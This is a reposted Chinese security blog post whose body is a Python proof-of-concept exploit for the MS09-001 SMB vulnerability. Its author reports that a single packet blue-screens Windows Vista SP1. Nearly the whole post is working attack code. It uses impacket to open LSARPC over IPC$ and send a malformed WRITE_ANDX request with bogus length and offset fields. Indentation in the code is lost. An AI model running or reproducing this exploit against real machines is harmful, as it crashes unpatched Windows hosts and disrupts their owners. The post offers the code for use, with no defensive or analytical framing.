NetCicala Security Salon

网蝉安全沙龙

公告

NetCicala Security Salon于2008-4-25正式开通
==================================================================

[zz]MS09-001 SMB Dos Poc Exploit

今天用python写了一个SMB dos的poc,测试vista sp1,

一个包过去立刻蓝屏,不过XP SP2还有点问题。

# MS09-001 SMB Dos Vulnerabilities Poc Exploit
# Author : vessial
# http://hi.baidu.com/vessial
# Todo:
# [+] test vista sp1,system BOSD
# Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
# http://www.milw0rm.com/exploits/6463
import impacket
from impacket import smb
from impacket import nmb


remote = smb.SMBPacket('')
r = smb.SMB('*SMBSERVER','192.168.40.129',None,nmb.TYPE_SERVER,445)
r._login('','','','WORKGROUP')
tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$')


smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0xc807
smb1['Tid'] = tid


ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
ntCreate['Data'] = smb.SMBNtCreateAndX_Data()
ntCreate['Parameters']['FileNameLength'] = 14
ntCreate['Parameters']['AndXOffset'] = 0xdede
ntCreate['Parameters']['CreateFlags'] = 0x16
ntCreate['Parameters']['AccessMask'] = 0x2019f
ntCreate['Parameters']['CreateOptions'] = 0x400040
ntCreate['Parameters']['ShareAccess'] = 7
ntCreate['Parameters']['Impersonation'] = 2
ntCreate['Parameters']['Disposition'] = 1

ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
smb1.addCommand(ntCreate)
r.sendSMB(smb1)

recv=r.recvSMB()
if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):
ntCreateResponse = smb.SMBCommand(recv['Data'][0])
ntCreateParameters =smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])
fid = ntCreateParameters['Fid']

smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0
smb1['Tid'] = tid
data = "A"*72

writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)



smb1.addCommand(writeAndX)

writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters()
writeAndX['Parameters']['Fid'] = fid
writeAndX['Parameters']['AndXOffset'] = 0xdede
writeAndX['Parameters']['Offset'] = 0
writeAndX['Parameters']['WriteMode'] = 8
writeAndX['Parameters']['Remaining'] = len(data)
writeAndX['Parameters']['_reserved'] = -1
writeAndX['Parameters']['DataLength'] = 0xffff
writeAndX['Parameters']['DataOffset'] = 0xffff
writeAndX['Parameters']['HighOffset'] = 0xcccccccc
writeAndX['Data'] = data
r.sendSMB(smb1)

发帖者 netcicala 时间: 06:15:00